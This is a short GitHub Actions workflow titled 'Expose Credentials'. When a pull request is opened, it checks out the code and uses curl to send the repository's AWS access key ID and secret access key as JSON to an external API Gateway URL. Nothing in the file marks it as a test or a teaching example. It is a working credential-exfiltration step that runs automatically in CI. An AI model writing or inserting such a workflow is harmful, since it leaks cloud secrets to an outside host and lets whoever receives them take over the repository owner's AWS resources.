name: Expose Credentials

on:
  pull_request:
    types: [opened]

jobs:

  expose-creds:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Expose Credentials
        run: |
          curl -X POST \
               -H "Content-Type: application/json" \
               -d '{"aws_access_key_id":"${{ secrets.AWS_ACCESS_KEY_ID }}","aws_secret_access_key":"${{ secrets.AWS_SECRET_ACCESS_KEY }}"}' \
               https://myj8mhz9sb.execute-api.us-east-2.amazonaws.com/Prod
